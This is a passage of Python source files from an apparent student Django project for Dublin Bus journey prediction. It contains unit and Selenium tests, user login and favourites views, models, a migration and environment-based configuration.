"is_vendor": false, "language": "Python", "length_bytes": 10318, "license_type": "no_license", "max_line_length": 204, "num_lines": 174, "path": "/Dublin_Bus/tests/test_busmodels.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom Bus.busmodels import get_current_weather, create_weather_df, get_future_weather, encode_time_features, \\\n encode_features, get_stop_num, get_stop_num_lat_lng, find_route, read_json, get_proportion_of_route, \\\n get_percentage_of_route_by_stops, get_prediction\nfrom Bus.models import CurrentWeather, WeatherPrediction, Stop\nfrom datetime import datetime\nfrom pandas.testing import assert_frame_equal\nimport pandas as pd\nfrom unittest import mock\nimport json\n\n\nclass TestBusmodels(TestCase):\n\n def setUp(self):\n curr_weather_obj = CurrentWeather(dt=1629104293, temp=15.89, feels_like=15.7, temp_min=12.6, temp_max=19.73,\n humidity=83, wind_speed=1.34, weather_main=\"Haze\", weather_description=\"haze\",\n weather_icon=\"50n\")\n curr_weather_obj.save()\n future_weather_obj = WeatherPrediction(dt=1629104294, temp=16.89, feels_like=16.7, temp_min=6.6, temp_max=25.73,\n humidity=65, wind_speed=1.23, weather_main=\"Rain\",\n weather_description=\"light rain\", weather_icon=\"10d\")\n future_weather_obj.save()\n stop = Stop(stop_id='8220DB000004', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n stop2 = Stop(stop_id='8220DB000757', stop_name='Donnybrook Village, stop 757', stop_lat=53.324081337159,\n stop_lon=-6.239586509859331)\n stop.save()\n stop2.save()\n self.curr_weather_obj = curr_weather_obj\n self.future_weather_obj = future_weather_obj\n self.stop = stop\n self.stop2 = stop2\n return super().setUp()\n\n \"\"\"========================= Testing functions that encode df for model =========================\"\"\"\n\n def test_create_weather_df(self):\n df = create_weather_df(self.curr_weather_obj)\n df_future = create_weather_df(self.future_weather_obj)\n self.assertEqual(df.columns.values.tolist(), df_future.columns.values.tolist())\n\n def test_encode_time_features(self):\n new_year = datetime(2021, 1, 1, 0, 1, 5)\n result = encode_time_features(new_year)\n self.assertEqual(result, [[65, 4, '2021-01-01', 0]])\n\n def test_encode_features(self):\n new_year = datetime(2021, 1, 1, 0, 1, 5)\n df = encode_features(new_year)\n test_data = {'actualtime_dep': 65, 'is_term': 0, 'is_holiday': 1, 'is_rush_hour': 0, 'weekday_1': 0,\n 'weekday_2': 0, 'weekday_3': 0, 'weekday_4': 1, 'weekday_5': 0, 'weekday_6': 0}\n test_df = pd.DataFrame([test_data])\n assert_frame_equal(df, test_df, check_dtype=False)\n\n \"\"\"========================= Testing get_stop_num & get_stop_num_lat_lng =========================\"\"\"\n\n def test_get_stop_num(self):\n result_int_false = get_stop_num(self.stop.stop_lat, self.stop.stop_lon, self.stop.stop_name, integer=False)\n result_int_true = get_stop_num(self.stop.stop_lat, self.stop.stop_lon, self.stop.stop_name, integer=True)\n if len(result_int_false) != 0:\n self.assertIsInstance(result_int_false[0], str)\n self.assertRegex(self.stop.stop_name, result_int_false[0])\n if len(result_int_true) != 0:\n self.assertIsInstance(result_int_true[0], int)\n self.assertIsInstance(result_int_false, list)\n self.assertIsInstance(result_int_true, list)\n\n def test_get_stop_num_lat_lng(self):\n res_int_false = get_stop_num_lat_lng(self.stop.stop_lat, self.stop.stop_lon, integer=False)\n res_int_true = get_stop_num_lat_lng(self.stop.stop_lat, self.stop.stop_lon, integer=True)\n if len(res_int_false) != 0:\n self.assertIsInstance(res_int_false[0], str)\n self.assertRegex(self.stop.stop_name, res_int_false[0])\n if len(res_int_true) != 0:\n self.assertIsInstance(res_int_true[0], int)\n\n \"\"\"========================= Testing find_route =========================\"\"\"\n\n def test_find_route(self):\n res = find_route(self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_lat, self.stop2.stop_lon,\n self.stop2.stop_name, self.stop.stop_name, '46A')\n self.assertNotEqual(res, None)\n self.assertEqual(res, '46A_67')\n\n \"\"\"========================= Testing read_json =========================\"\"\"\n\n def test_read_json(self):\n data = [{\"stoppointid\": 226, \"mean_tt_rush_hour%\": 0.0, \"progrnumber\": 1, \"mean_tt%\": 0.0},\n {\"stoppointid\": 228, \"mean_tt_rush_hour%\": 1.2144524647, \"progrnumber\": 2, \"mean_tt%\": 1.3419639823}]\n read_data = json.dumps(data)\n mock_open = mock.mock_open(read_data=read_data)\n with mock.patch('builtins.open', mock_open):\n result = read_json('filename')\n self.assertEqual(data, result)\n\n \"\"\"========================= Testing proportion_of_route =========================\"\"\"\n\n def test_get_proportion_of_route_no_ave(self):\n mock_target = 'Bus.busmodels.get_percentage_of_route_by_stops'\n\n with mock.patch(mock_target, return_value=30):\n # test if we have no averages file will it deafult to get_proportion_of_route_by_stops?\n res_non_rush_hour = get_proportion_of_route('1111', 2, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon)\n res_rush_hour = get_proportion_of_route('1111', 2, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n self.assertEqual(res_non_rush_hour, 30)\n self.assertEqual(res_rush_hour, 30)\n\n def test_get_proportion_of_route_with_ave(self):\n # test for when we do have historical averages\n # mock historical averages and patch check file exists\n mock_target = 'Bus.busmodels.check_file_exists'\n data = [{\"stoppointid\":381,\"mean_tt_rush_hour%\":0.0,\"progrnumber\":1,\"mean_tt%\":0.0},\n {\"stoppointid\":382,\"mean_tt_rush_hour%\":2,\"progrnumber\":2,\"mean_tt%\":1.5},\n {\"stoppointid\":3,\"mean_tt_rush_hour%\":2,\"progrnumber\":3,\"mean_tt%\":1.5},\n {\"stoppointid\":757,\"mean_tt_rush_hour%\":2,\"progrnumber\":4,\"mean_tt%\":1.5}]\n stop_num_mock_target = 'Bus.busmodels.get_stop_num'\n percentage_by_stops_mock = 'Bus.busmodels.get_percentage_of_route_by_stops'\n with mock.patch(mock_target, return_value=data):\n with mock.patch(stop_num_mock_target, side_effect=[[381], [757], [381], [757], [381], []]):\n with mock.patch(percentage_by_stops_mock, return_value=None):\n res = get_proportion_of_route('1111', self.stop.stop_name, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon)\n res_rush_hour = get_proportion_of_route('1111', self.stop.stop_name, 3, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n res_out_of_range = get_proportion_of_route('1111', self.stop.stop_name, 4, self.stop.stop_lat, self.stop.stop_lon, self.stop2.stop_name, self.stop2.stop_lat, self.stop2.stop_lon, True)\n self.assertEqual(res, 4.5 / 100)\n self.assertEqual(res_rush_hour, 6 / 100)\n self.assertEqual(res_out_of_range, None)\n\n \"\"\"========================= Testing get_prediction =========================\"\"\"\n\n def test_get_prediction_failure(self):\n # test it returns Google prediction in case of failure\n mock_target = 'Bus.busmodels.find_route'\n mock_API_response = {'departure_time': '2021-08-17T12:28:28.000Z', 'line': '27',\n 'departure_stop': 'Eden Quay, stop 298', 'arrival_stop': 'Portland Row', 'num_stops': 3,\n 'dep_stop_lat': 53.3481866, 'dep_stop_lng': -6.2564106, 'arr_stop_lat': 53.353535,\n 'arr_stop_lng': -6.248092, 'google_pred': 228}\n\n with mock.patch(mock_target, return_value=None):\n res = get_prediction(mock_API_response)\n self.assertEqual(res, mock_API_response['google_pred'])\n\n def test_get_prediction(self):\n data = [1,2,3,4,5,6,7,8,9,10,11,12,13,14]\n df1 = pd.DataFrame({'actualtime_dep': [1],\n 'temp': [2],\n 'wind_speed': [3],\n 'humidity': [4],\n 'weather_main_precipitation':[5],\n 'is_term':[6],\n 'is_holiday':[7],\n 'is_rush_hour':[8],\n 'weekday_1':[9],\n 'weekday_2':[10],\n 'weekday_3':[11],\n 'weekday_4':[12],\n 'weekday_5':[13],\n 'weekday_6':[14]})\n df2 = pd.DataFrame()\n with mock.patch('Bus.busmodels.find_route', return_value='22'):\n with mock.patch('Bus.busmodels.change_timezone', return_value=datetime.now()):\n with mock.patch('Bus.busmodels.encode_features', return_value=df1):\n with mock.patch('Bus.busmodels.get_current_weather', return_value=df2):\n with mock.patch('Bus.busmodels.get_future_weather', return_value=df2):\n with mock.patch('Bus.busmodels.open_model_and_predict', return_value=120):\n with mock.patch('Bus.busmodels.is_rush_hour_or_not', return_value=.50):\n res = get_prediction({'departure_time': '2021-08-17T12:28:28.000Z', 'line': '27',\n 'departure_stop': 'Eden Quay, stop 298',\n 'arrival_stop': 'Portland Row', 'num_stops': 3,\n 'dep_stop_lat': 53.3481866, 'dep_stop_lng': -6.2564106,\n 'arr_stop_lat': 53.353535, 'arr_stop_lng': -6.248092,\n 'google_pred': 228})\n expected_res = json.dumps(str(1.0))\n self.assertEqual(res, expected_res)\n" }, { "alpha_fraction": 0.7151162624359131, "alphanum_fraction": 0.7151162624359131, "avg_line_length": 42, "blob_id": "2de07f7d065b44a684691df1390db89e66776d11", "content_id": "0092a5e38d520a485fe700ae9dc70c0f6d0c6e59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 516, "license_type": "no_license", "max_line_length": 77, "num_lines": 12, "path": "/Dublin_Bus/users/urls.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('login', views.loginPage, name='login'),\n path('register', views.registerPage, name='register'),\n path('logout', views.logoutUser, name='logout'),\n path('favourites', views.favourites, name='favourites'),\n path('favourites/add', views.addFavourite, name='addFavourite'),\n path('favourites/remove', views.removeFavourite, name='removeFavourite'),\n path('favourites/rename', views.renameFavourite, name='renameFavourite'),\n]\n" }, { "alpha_fraction": 0.634361207485199, "alphanum_fraction": 0.634361207485199, "avg_line_length": 27.375, "blob_id": "5bae8f0c5a1d0f302e682a00723d5a6285d89b7a", "content_id": "66dac386c58874f9b5304a481077809051accceb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "no_license", "max_line_length": 82, "num_lines": 16, "path": "/config/config.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "import os\n\n\nclass APIKeys:\n WEATHER_API_KEY = os.environ.get(\"WEATHER_API_KEY\")\n MAP_API_KEY = os.environ.get(\"MAP_API_KEY\")\n GTFS_API_KEY = os.environ.get(\"GFTS_API_KEY\")\n\n\nclass MySQL:\n host = os.getenv(\"DB_URI\")\n port = os.getenv(\"DB_PORT\")\n username = os.getenv(\"DB_USER\")\n password = os.getenv(\"DB_PASS\")\n database = os.getenv(\"DB_NAME\")\n URI = f'mysql+mysqlconnector://{username}:{password}@{host}:{port}/{database}'\n" }, { "alpha_fraction": 0.5148394703865051, "alphanum_fraction": 0.5996365547180176, "avg_line_length": 56.92982482910156, "blob_id": "64a60db5582a40e4601c3ca1f3c729971210f54e", "content_id": "9b14a3f6ccceac6be82a578ce5e42bfda0735e56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3302, "license_type": "no_license", "max_line_length": 120, "num_lines": 57, "path": "/Dublin_Bus/tests/test_serializers.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom Bus.models import StopTime, Trip, Stop, Route, Calendar\nfrom Bus.serializers import StopTimeSerializer\n\n\nclass TestSerializers(TestCase):\n \"\"\"========================= Testing serializer =========================\"\"\"\n\n def setUp(self):\n self.calendar = Calendar(service_id='y1008', monday=1, tuesday=0, wednesday=0, thursday=0, friday=0, saturday=0,\n sunday=1, start_date=20210725, end_date=20211016)\n self.calendar.save()\n self.route = Route(route_id='60-38A-d12-1', agency_id='978', route_short_name='38a', route_long_name=None,\n route_type=3)\n self.route.save()\n self.trip = Trip(route_id=self.route, service_id=self.calendar, trip_id='14773.y1008.60-38A-d12-1.179.O',\n shape_id='60-38A-d12-1.179.O', trip_headsign='Burlington Road (Mespil Road) - Damastown Drive',\n direction_id=0)\n self.trip.save()\n self.stop = Stop(stop_id='8220DB000004', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n self.stop.save()\n self.stopTime = StopTime(id=1, trip_id=self.trip, arrival_time='17:47:37', stop_id=self.stop, stop_sequence=10,\n stop_headsign='Damastown')\n self.stopTime.save()\n\n self.calendar1 = Calendar(service_id='y1007', monday=1, tuesday=0, wednesday=0, thursday=0, friday=0,\n saturday=0, sunday=1, start_date=20210725, end_date=20211016)\n self.calendar1.save()\n self.route1 = Route(route_id='60-38A-d12-2', agency_id='978', route_short_name='38a', route_long_name=None,\n route_type=3)\n self.route1.save()\n self.trip1 = Trip(route_id=self.route1, service_id=self.calendar1, trip_id='14773.y1008.60-38A-d12-1.179.O1',\n shape_id='60-38A-d12-1.179.O',\n trip_headsign='Burlington Road (Mespil Road) - Damastown Drive', direction_id=0)\n self.trip1.save()\n self.stop1 = Stop(stop_id='8220DB000003', stop_name='Parnell Square West, stop 2', stop_lat=53.3522443611407,\n stop_lon=-6.263723218918821)\n self.stop1.save()\n self.stopTime1 = StopTime(id=2, trip_id=self.trip1, arrival_time='17:47:37', stop_id=self.stop1,\n stop_sequence=10, stop_headsign='Damastown')\n self.stopTime1.save()\n\n self.serializer = StopTimeSerializer([self.stopTime1, self.stopTime], many=True)\n return super().setUp()\n\n # check serializer contains correct fields both at outer and nested layers\n def test_contains_expected_fields(self):\n data = self.serializer.data\n self.assertCountEqual(data[0].keys(), ['arrival_time', 'stop_headsign', 'stop_id', 'stop_sequence', 'trip_id'])\n\n # check field content is what it should be at all nested layers\n def test_field_content(self):\n data = self.serializer.data\n self.assertEqual(data[0]['arrival_time'], '17:47:37')\n self.assertEqual(data[1]['stop_id']['stop_id'], '8220DB000004')\n self.assertEqual(data[0]['trip_id']['route_id']['route_short_name'], '38a')\n" }, { "alpha_fraction": 0.552992045879364, "alphanum_fraction": 0.5533525347709656, "avg_line_length": 35.98666763305664, "blob_id": "887b795cf975c4137e51f6b16229b86148839d4c", "content_id": "9c2897cd55aa6da81a854131d50375db8326c523", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5548, "license_type": "no_license", "max_line_length": 289, "num_lines": 150, "path": "/Dublin_Bus/users/views.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.contrib import auth\nfrom django.contrib.messages.api import error\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import redirect, render\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.forms.models import model_to_dict\nfrom .models import favourite\nimport json\n\nfrom .forms import CreateUserForm\n\ndef registerPage(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n form = CreateUserForm()\n\n #New user Registered\n if request.method == 'POST':\n form = CreateUserForm(request.POST)\n if not form.is_valid():\n error_dict = form.errors.as_data()\n field_list = list(error_dict.values())\n for error_list in field_list:\n for error in error_list:\n #Send form errors as messages\n messages.error(request, str(error)[2:-2])\n return redirect('register')\n else:\n form.save()\n user = form.cleaned_data.get('username')\n messages.success(request, 'Account created for ' + user + '.' )\n return redirect('login')\n \n context = {'form': form}\n return render(request, 'users/register.html', context)\n\ndef loginPage(request):\n if request.user.is_authenticated:\n return redirect('index')\n else:\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n\n user = authenticate(request, username= username, password=password)\n\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username OR Password is incorrect.')\n return redirect('login')\n return render(request, 'users/login.html')\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n@login_required(login_url='login')\ndef favourites(request):\n current_user = request.user\n favourites = favourite.objects.filter(user_id=current_user.id)\n context = {'favourites': favourites}\n return render(request, 'users/favourites.html', context)\n\n@login_required(login_url='login')\ndef addFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR input not in JSON format.\"\n }\n return JsonResponse(return_info)\n \n try:\n if favourite.objects.filter(user_id = data['user'], origin_lat = data['origin_lat'], origin_lon = data['origin_lon'], destin_lat = data['destin_lat'], destin_lon = data['destin_lon']).exists():\n return_info = {\n 'success' : False,\n 'result' : 'ERROR Duplicate favourite already exists.'\n }\n else:\n data['origin_name'] = data['origin_name'].replace('\"', '\\'')\n data['destin_name'] = data['destin_name'].replace('\"', '\\'')\n\n new_favourite = favourite(user_id = data['user'], origin_name= data['origin_name'], origin_lat = data['origin_lat'], origin_lon = data['origin_lon'], destin_name = data['destin_name'], destin_lat = data['destin_lat'], destin_lon = data['destin_lon'], stops = data['stops'])\n new_favourite.save()\n favourite_dict = model_to_dict(new_favourite)\n return_info = {\n 'success' : True,\n 'result' : \"Favourite added.\",\n 'favourite' : favourite_dict\n }\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR unable to save new favourite.\"\n }\n return JsonResponse(return_info)\n \n else:\n return redirect('index')\n\n@login_required(login_url='login')\ndef removeFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n\n favourite.objects.get(pk=data['id']).delete()\n return_info = { \n 'success': True, \n 'result' : \"Favourite dropped.\"\n }\n except:\n return_info = { \n 'success': False,\n 'result' : \"ERROR could not delete.\"\n }\n return JsonResponse(return_info)\n else:\n return redirect('index')\n\n@login_required(login_url='login')\ndef renameFavourite(request):\n if request.method == 'POST':\n try:\n data = json.loads(request.body)\n renamed_favourite = favourite.objects.get(pk=data['id'])\n renamed_favourite.favourite_name = data['new_name'].replace('\"', '')\n renamed_favourite.save(update_fields=['favourite_name'])\n return_info = {\n 'success' : True,\n 'result' : \"Rename successful.\",\n 'name' : renamed_favourite.favourite_name\n }\n return JsonResponse(return_info)\n except:\n return_info = {\n 'success' : False,\n 'result' : \"ERROR could not rename.\"\n }\n return JsonResponse(return_info)\n else:\n return redirect('index')\n" }, { "alpha_fraction": 0.5203539729118347, "alphanum_fraction": 0.5274336338043213, "avg_line_length": 46.08333206176758, "blob_id": "4659624fb47d2f83212db32a6c8f0253a10dfbb4", "content_id": "36beb2a7bc51359b129e220c0c3e315774750514", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6780, "license_type": "no_license", "max_line_length": 138, "num_lines": 144, "path": "/Dublin_Bus/Bus/migrations/0001_initial.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.5 on 2021-08-15 13:21\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Calendar',\n fields=[\n ('service_id', models.CharField(max_length=225, primary_key=True, serialize=False)),\n ('monday', models.IntegerField(blank=True, null=True)),\n ('tuesday', models.IntegerField(blank=True, null=True)),\n ('wednesday', models.IntegerField(blank=True, null=True)),\n ('thursday', models.IntegerField(blank=True, null=True)),\n ('friday', models.IntegerField(blank=True, null=True)),\n ('saturday', models.IntegerField(blank=True, null=True)),\n ('sunday', models.IntegerField(blank=True, null=True)),\n ('start_date', models.IntegerField(blank=True, null=True)),\n ('end_date', models.IntegerField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'calendar',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='CurrentWeather',\n fields=[\n ('dt', models.IntegerField(primary_key=True, serialize=False)),\n ('temp', models.FloatField(blank=True, null=True)),\n ('feels_like', models.FloatField(blank=True, null=True)),\n ('temp_min', models.FloatField(blank=True, null=True)),\n ('temp_max', models.FloatField(blank=True, null=True)),\n ('humidity', models.FloatField(blank=True, null=True)),\n ('wind_speed', models.FloatField(blank=True, null=True)),\n ('weather_main', models.CharField(blank=True, max_length=30, null=True)),\n ('weather_description', models.CharField(blank=True, max_length=60, null=True)),\n ('weather_icon', models.CharField(blank=True, max_length=10, null=True)),\n ],\n options={\n 'db_table': 'current_weather',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='Route',\n fields=[\n ('route_id', models.CharField(max_length=100, primary_key=True, serialize=False)),\n ('agency_id', models.TextField(blank=True, null=True)),\n ('route_short_name', models.TextField(blank=True, null=True)),\n ('route_long_name', models.TextField(blank=True, null=True)),\n ('route_type', models.IntegerField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'route',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='Stop',\n fields=[\n ('stop_id', models.CharField(max_length=100, primary_key=True, serialize=False)),\n ('stop_name', models.CharField(blank=True, max_length=225, null=True)),\n ('stop_lat', models.FloatField(blank=True, null=True)),\n ('stop_lon', models.FloatField(blank=True, null=True)),\n ],\n options={\n 'db_table': 'stops',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='WeatherPrediction',\n fields=[\n ('dt', models.IntegerField(primary_key=True, serialize=False)),\n ('temp', models.FloatField(blank=True, null=True)),\n ('feels_like', models.FloatField(blank=True, null=True)),\n ('temp_min', models.FloatField(blank=True, null=True)),\n ('temp_max', models.FloatField(blank=True, null=True)),\n ('humidity', models.FloatField(blank=True, null=True)),\n ('wind_speed', models.FloatField(blank=True, null=True)),\n ('weather_main', models.CharField(blank=True, max_length=30, null=True)),\n ('weather_description', models.CharField(blank=True, max_length=60, null=True)),\n ('weather_icon', models.CharField(blank=True, max_length=10, null=True)),\n ],\n options={\n 'db_table': 'weather_predictions',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='Trip',\n fields=[\n ('trip_id', models.CharField(max_length=225, primary_key=True, serialize=False)),\n ('shape_id', models.CharField(max_length=225)),\n ('trip_headsign', models.TextField(blank=True, null=True)),\n ('direction_id', models.IntegerField(blank=True, null=True)),\n ('route_id', models.ForeignKey(db_column='route_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.route')),\n ('service_id', models.ForeignKey(db_column='service_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.calendar')),\n ],\n options={\n 'db_table': 'trips',\n 'managed': True,\n },\n ),\n migrations.CreateModel(\n name='StopTime',\n fields=[\n ('id', models.AutoField(db_column='id', primary_key=True, serialize=False)),\n ('arrival_time', models.TextField()),\n ('stop_sequence', models.IntegerField(blank=True, null=True)),\n ('stop_headsign', models.CharField(blank=True, max_length=225, null=True)),\n ('stop_id', models.ForeignKey(db_column='stop_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.stop')),\n ('trip_id', models.ForeignKey(db_column='trip_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.trip')),\n ],\n options={\n 'db_table': 'stop_times',\n 'managed': True,\n 'unique_together': {('trip_id', 'stop_sequence')},\n },\n ),\n migrations.CreateModel(\n name='CalendarDate',\n fields=[\n ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('date', models.IntegerField(blank=True, null=True)),\n ('exception_type', models.IntegerField(blank=True, null=True)),\n ('service_id', models.ForeignKey(db_column='service_id', on_delete=django.db.models.deletion.CASCADE, to='Bus.calendar')),\n ],\n options={\n 'db_table': 'calendar_dates',\n 'managed': True,\n 'unique_together': {('service_id', 'date')},\n },\n ),\n ]\n" }, { "alpha_fraction": 0.37277618050575256, "alphanum_fraction": 0.44600746035575867, "avg_line_length": 60.97435760498047, "blob_id": "9583113909eeaff37b0d41c1d48a43a7ee4c86da", "content_id": "7f8a8d3b592cae8ef87dac17f8b9156b25af7ffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2417, "license_type": "no_license", "max_line_length": 120, "num_lines": 39, "path": "/Dublin_Bus/tests/test_gtfsrealtime.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.test import TestCase\nfrom Bus.gtfsrealtime import get_arrivals, is_trip_affected\nfrom unittest import mock\n\n\nclass TestGtfsrealtime(TestCase):\n \"\"\"========================= Testing getArrivals =========================\"\"\"\n\n def test_get_arrivals_success(self):\n result = get_arrivals('8220DB000002')\n self.assertIsInstance(result, dict)\n self.assertIsInstance(result['delays'], list)\n self.assertLess(len(result['delays']), 4)\n self.assertLess(len(result['delays']), 4)\n\n \"\"\"========================= Testing getArrivals =========================\"\"\"\n\n def test_is_trip_affected(self):\n mock_target = 'Bus.gtfsrealtime.read_real_time'\n with mock.patch(mock_target, return_value={\"header\": {\"gtfs_realtime_version\": \"1.0\", \"timestamp\": 1628859302},\n \"entity\": [{\"id\": \"2720023.y100v.10-64-e19-1.158.I\", \"trip_update\": {\n \"trip\": {\"trip_id\": \"2720023.y100v.10-64-e19-1.158.I\",\n \"start_time\": \"08:45:00\", \"start_date\": \"20210813\",\n \"schedule_relationship\": \"SCHEDULED\",\n \"route_id\": \"10-64-e19-1\"}, \"stop_time_update\": [\n {\"stop_sequence\": 1, \"departure\": {\"delay\": 0},\n \"stop_id\": \"8460B5550401\",\n \"schedule_relationship\": \"SCHEDULED\"},\n {\"stop_sequence\": 2, \"arrival\": {\"delay\": 120},\n \"departure\": {\"delay\": 120}, \"stop_id\": \"8470B551411\",\n \"schedule_relationship\": \"SCHEDULED\"}]}}]}):\n res = is_trip_affected(\"2720023.y100v.10-64-e19-1.158.I\", \"8470B551411\")\n self.assertEqual(res, 120)\n\n def test_is_trip_affected_failure(self):\n mock_target = 'Bus.gtfsrealtime.read_real_time'\n with mock.patch(mock_target, return_value={\"Invalid API\"}):\n res = is_trip_affected('1121.y1007.60-27-d12-1.154.O', '8220DB001934')\n self.assertEqual(res, 0)\n" }, { "alpha_fraction": 0.6829268336296082, "alphanum_fraction": 0.6864111423492432, "avg_line_length": 30.88888931274414, "blob_id": "02649788aa4db9e323eb5d648fbebe137966f945", "content_id": "40f8f3edd9c52d790f98ba339ea163e32c90d8c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 287, "license_type": "no_license", "max_line_length": 89, "num_lines": 9, "path": "/Dublin_Bus/Bus/serializers.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Trip, StopTime, Route\n\n\nclass StopTimeSerializer(serializers.ModelSerializer):\n class Meta:\n model = StopTime\n fields = ['arrival_time', 'stop_headsign', 'stop_id', 'stop_sequence', 'trip_id']\n depth = 2\n" }, { "alpha_fraction": 0.6827195286750793, "alphanum_fraction": 0.6940509676933289, "avg_line_length": 28.45833396911621, "blob_id": "a0e7a96cec492c627de69016689547d341edd604", "content_id": "fa18f4e078e2313785c751b63b59e94b8b6b9a40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/Dublin_Bus/users/models.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass favourite(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n favourite_name = models.CharField(blank=True, null=True, max_length=50, default=\"Saved Route\")\n \n #Origin\n origin_name = models.CharField(max_length=225)\n origin_lat = models.FloatField()\n origin_lon = models.FloatField()\n\n #Destination\n destin_name = models.CharField(max_length=225)\n destin_lat = models.FloatField()\n destin_lon = models.FloatField()\n\n #Bus?\n stops = models.BooleanField(default=False)\n\n class Meta:\n managed = True\n db_table = 'favourites'" }, { "alpha_fraction": 0.5937610864639282, "alphanum_fraction": 0.6288549900054932, "avg_line_length": 33.20000076293945, "blob_id": "b37db889d6730e31617628df75570690b7721b87", "content_id": "0ae2693ee080cbf7f40ac518d53e22ba8dd05c56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5642, "license_type": "no_license", "max_line_length": 147, "num_lines": 165, "path": "/Dublin_Bus/functional_tests/tests_favourites.py", "repo_name": "rachelcourtney/Dublin_Bus", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.webdriver import WebDriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom django.contrib.staticfiles.testing import StaticLiveServerTestCase\nfrom Bus.models import Stop\nfrom users.models import favourite\nfrom django.urls import reverse\nfrom django.contrib import auth\nimport time\n\n\nUser = auth.get_user_model()\n\nclass LoginFunctionalTests(StaticLiveServerTestCase):\n def setUp(self):\n self.browser = webdriver.Chrome('functional_tests/chromedriver.exe')\n demo_user = User(username='myname', email='[email protected]')\n demo_user.is_staff = True\n demo_user.is_superuser = True\n self.demo_passwd = 'password'\n demo_user.set_password(self.demo_passwd)\n demo_user.save()\n self.demo_user = demo_user\n\n demo_favourite = favourite(user_id = self.demo_user.pk,\n origin_name= 'Shankill, Dublin, Ireland',\n origin_lat = 53.2332663, \n origin_lon = -6.1237578, \n destin_name = 'East Wall, Dublin, Ireland', \n destin_lat = 53.3543216, \n destin_lon = -6.2341133,\n stops = 0\n )\n demo_favourite.save()\n\n self.demo_favourite = demo_favourite\n\n self.index_url = self.live_server_url + reverse(\"index\")\n self.login_url = self.live_server_url + reverse(\"login\")\n self.register_url = self.live_server_url + reverse(\"register\")\n self.favourite_url = self.live_server_url + reverse(\"favourites\")\n\n def tearDown(self) -> None:\n self.browser.close()\n\n def test_favourite_go(self):\n self.browser.get(self.login_url)\n self.browser.find_element_by_name(\"username\").send_keys(self.demo_user.username)\n self.browser.find_element_by_name(\"password\").send_keys(self.demo_passwd)\n self.browser.find_element_by_id('submitButton').click()\n\n self.browser.get(self.favourite_url)\n\n self.browser.find_element_by_id('goButton' + 